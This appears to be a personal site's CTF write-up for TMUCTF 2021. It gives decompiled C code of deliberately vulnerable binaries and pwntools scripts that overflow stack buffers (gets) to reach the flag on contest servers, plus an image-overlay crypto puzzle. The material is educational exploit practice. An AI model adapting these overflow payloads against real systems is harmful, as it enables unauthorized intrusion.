MasterWard Profile
  • Introduction
  • Media Links
  • Resume
  • HackThebox Notes
    • RedPanda
    • Metatwo
  • CTF Contest Writeups
    • 2017
      • Takoma Park CTF
      • TUCTF 2017
      • HITCON CTF 2017 Quals
      • CSAW CTF Qualification Round 2017
      • SEC-T CTF
      • Backdoor CTF 2017
      • Hack Dat Kiwi 2017
      • Kaspersky 2017
      • Hack.lu 2017
      • HackCon 2017
      • Defcamp 2017
      • Square CTF 2017
      • Mitre 2017
      • EKOPARTY CTF 2017
    • 2018
      • SEC-T CTF
      • Hackcon 2018
      • EasyCTF IV 2018
      • DefCamp CTF Qualifiers
      • PACTF 2018
      • CSAW CTF Qualifiers 2018
      • PicoCTF 2018
    • 2019
      • Newark Academy CTF 2019
      • Crypto CTF 2019
      • PicoCTF 2019
        • General Skills
        • Binary Exploitations
        • Forensics
        • Reverse Engineering
        • Cryptography
        • Web Exploitation
      • TAMUctf 19
    • 2021
      • picoCTF 2021
        • General Skills
        • Binary Exploitation
        • Forensics
        • Reverse Engineering
        • Cryptography
        • Web Exploitation
      • HackiHoli
      • S.H.E.L.L CTF
      • DawgCTF 2021
      • TCTF 2021
      • RedPwnCTF 2021
      • IJCTF 2021
      • UIUCTF 2021
      • Really Awesome CTF 2021
      • TMUCTF 2021
      • CSAW Qualifiers 2021
      • Pbjar CTF 2021
      • Deadface CTF 2021
    • 2022
      • NahamCon CTF 2022
      • BYUCTF 2022
      • DEF CON Qualifiers 2022
    • Useful Code
  • Software
    • Video Standardization and Compression
    • TOBIAS
    • Tracking Phone
    • Image Compression
    • Do Not Call Database
    • Color Blind Simulator
    • Gmail Unsubscriber
    • MP4 to GIF Converter
    • Optical Character Reading
    • Soft Jobs
    • OBD Project
    • Online Movie Finder
    • Work In Progress
      • Incremental Backup
      • Web Scraper - Wallpaper Edition
      • Web Blocker
      • File Manipulator
      • AppFiller
      • Cyber Security Projects
      • Bsaber AI
    • Ideas
      • CAN Programming
      • Malicious Programs
      • Remove Yourself from the Internet
      • DNA Classic
      • Auto Clicker
      • Adding Depth to a Video
      • Collage Mosaic Generator
      • Game Destroyer
      • Hearing aid Technology
      • Sign Language Recognition
      • Text Summarizer
      • Video to audio to text
      • Video Object Detection
      • VR demonstration
      • More Ideas to Elaborate on
    • Failure
      • Police Camera Radar
      • Already Created
      • Google Maps Game
      • Car price prediction
      • Bullshit Detector
      • Automated Code writter
      • Career Prediction
      • Samsung Remote Control Hack
      • Invalid Finder
      • PiHole Regex Filter
      • Group Archiver
  • Additional Articles
    • Cleaning Up a Computer Tricks
    • Getting started in Cyber Security
    • Speeding Up Your Internet
    • College Experience
    • Currently Writting
      • Reverse Engineering Notes
      • Bug Bounty Guide and Examples
      • OSCP help
      • Job Experience
      • Professional Job-Hunting Experience
Powered by GitBook
On this page
  • Pwn
  • Warmup [50 pts]
  • Baby Pwn [50 pts]
  • Are you admin [198 pts] [Not Solved]
  • Welcome
  • Warmup [50 pts]

Was this helpful?

  1. CTF Contest Writeups
  2. 2021

TMUCTF 2021

Pwn

Warmup [50 pts]

Description

Just a simple warmup!

nc 194.5.207.56 7000, nc 185.239.107.54 7000

int main() {
  char local_58 [76];
  int local_c;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  tmulogo();
  puts("Welcome to TMUCTF 2021! Let us know your name: ");
  local_c = 0;
  gets(local_58);
  puts("Thanks!\n");
  if (local_c != 0) {
    system("cat flag.txt");
  }
  return 0;
}

Solution

This is the first thing you learn when opening a book for reverse engineering/pwn. A buffer overflow to access the flag.

from pwn import *

payload = b"A" * 78
#binary = process("./warmup")
binary = remote("194.5.207.56",  7000)
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload)
binary.interactive()

Flag: TMUCTF{??????}

Baby Pwn [50 pts]

Description

Can you get the flag?

nc 194.5.207.56 7010, nc 185.239.107.54 7010

Decompiled Code

int main(void) {
  char name [28];
  int local_c;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  local_c = 0;
  puts("Hi, Please enter your name: ");
  gets(name);
  if (local_c == 0xcafe) {
    helloUser(name);
  }
  return 0;
}
void helloUser(undefined8 param_1) {
  char local_88 [128];
  
  printf("Nice to meet you %s!\n",param_1);
  puts("Tell me about yourself ;;)");
  gets(local_88);
  puts("It was a pleasure meeting you.");
  return;
}

Solution

This is a common warmup problem that appears in CTF so I went through it easily. Well sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong and that was a simple fix was all it took. The Code is below.

from pwn import *
import time

addr1 = 0xcafe
flag_os = 0x4012f0
payload = b"A" * 28
payload2 = b"A" * 128
newline = bytes('\n', 'utf-8')

#binary = process("./babypwn")
binary = remote('194.5.207.56', 7010)
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload + p64(addr1))
# Makes it to Hello User
print(binary.recvuntil(bytes(")", "utf-8")))
# Get to here
binary.sendline(payload2 + p64(flag_os) + p64(flag_os))
binary.interactive()

Flag: TMUCTF{??????}

Are you admin [198 pts] [Not Solved]

Description

Just admin can get the flag! Note that the admin likes integers!

nc 194.5.207.113 7020, nc 185.97.117.19 7020

int main(void) {
  int iVar1;
  char local_128 [128];
  char password [64];
  char user [64];
  FILE *local_28;
  int num1;
  int num2;
  int num3;
  int num4;
  int num5;
  
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  tmulogo();
  num5 = 0;
  num4 = 0;
  num3 = 0;
  num2 = 0;
  num1 = 0;
  puts("Enter username:");
  gets(user);
  puts("Enter password:");
  gets(password);
  iVar1 = strcmp(user,"AlexTheUser");
  if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) &&
      (num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
    local_28 = fopen("flag.txt","r");
    if (local_28 == (FILE *)0x0) {
      printf("Missing flag.txt. Contact an admin if you see this on remote.");
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    fgets(local_128,0x80,local_28);
    printf("%s",local_128);
  }
  return 0;
}

Solution

from pwn import *


user = bytes("AlexTheUser", "utf-8")
password = bytes("4l3x7h3p455w0rd", "utf-8")
#print(len(p64(flag_address)))
#binary = process("./areyouadmin")
#binary.close()
binary = remote("194.5.207.113",  7020)
print(binary.recvuntil(bytes("username:", "utf-8")))
binary.sendline(user)
print(binary.recvuntil(bytes("password:", "utf-8")))
binary.sendline(password)
#binary.sendline(payload + p64(flag_address))
#binary.interactive()
binary.close()
print("made it to the numbers")

"""
top = 233
found = False
i1 = 0
i4 = 0
i5 = 0
while not found:
	for i2 in range(100, top):
		for i3 in range(100, top):
			i1 = (-1 * i3 * i2) + 0x16d3
			i4 = (0x37a2 - i2) / i3
			# Using New Known
			i5 = (0x253f - i3) / i4
			if (i5 + i2 * i1) == 0x1bc9:
				print(i1, i2, i3, i4, i5)
			if (i4 + i1 * i5) == 0x703f:
				print(i1, i2, i3, i4, i5)
				

				
"""		
# 233 30 187 76 123		

"""
  if (((num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
"""
"""
top = 100
for i1 in range(0 , 100):
	print(i1)
	for i2 in range(0 , 10000):
		for i3 in range(28, 32):
			for i4 in range(90, 100):
				for i5 in range(90, 100):
					if (i3 + i5 * i4 == 9535):
						if(i2 + i4 * i3 == 14242):
							print(i2, i3, i4)
							if(i1 + i3 * i2 == 5843):
								if (i5 + i2 * i1 == 7113):
									if (i4 + i1 * i5 == 28735):
										print(i1, i2, i3, i4, i5)
										
"""
# Original Guess = 9535 14242 5843 7113 28735

#num1 + num3 * num2 == 0x16d3
#num3 + num5 * num4 == 0x253f
#num2 + num4 * num3 == 0x37a2
#num5 + num2 * num1 == 0x1bc9
#num4 + num1 * num5 == 0x703f

Welcome

Warmup [50 pts]

Description

A fun visual cryptography tool will amaze your kids!

Note: Remember the flag format is TMUCTF{...}.

Solution

Notice a small difference in the two file sizes. I was like hmmm let me see what would happen if I combine the images. I overlayed one on top of the other one and got the final image of the flag.

Flag: TMUCTF{W3_h0p3_y0u_3nj0y_7h15_c0mp371710n_4nd_7h4nk_y0u!}

PreviousReally Awesome CTF 2021NextCSAW Qualifiers 2021

Last updated 3 years ago

Was this helpful?

111KB
secret.png
image
Image1
111KB
ciphered_message.png
image
Image2